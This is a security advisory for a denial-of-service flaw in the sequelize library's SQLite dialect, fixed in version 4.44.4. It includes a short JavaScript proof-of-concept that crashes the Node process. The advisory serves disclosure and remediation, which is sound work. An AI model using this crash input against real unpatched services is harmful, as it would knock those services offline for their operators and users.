GMS-2020-771: Denial of Service in sequelize
Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.
The following proof-of-concept crashes the Node process:
const Sequelize = require('sequelize');
const sequelize = new Sequelize({
dialect: 'sqlite',
storage: 'database.sqlite'
});
const TypeError = sequelize.define('TypeError', {
name: Sequelize.STRING,
});
TypeError.sync({force: true}).then(() => {
return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});
Recommendation
Upgrade to version 4.44.4 or later.
References
Detect and mitigate GMS-2020-771 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →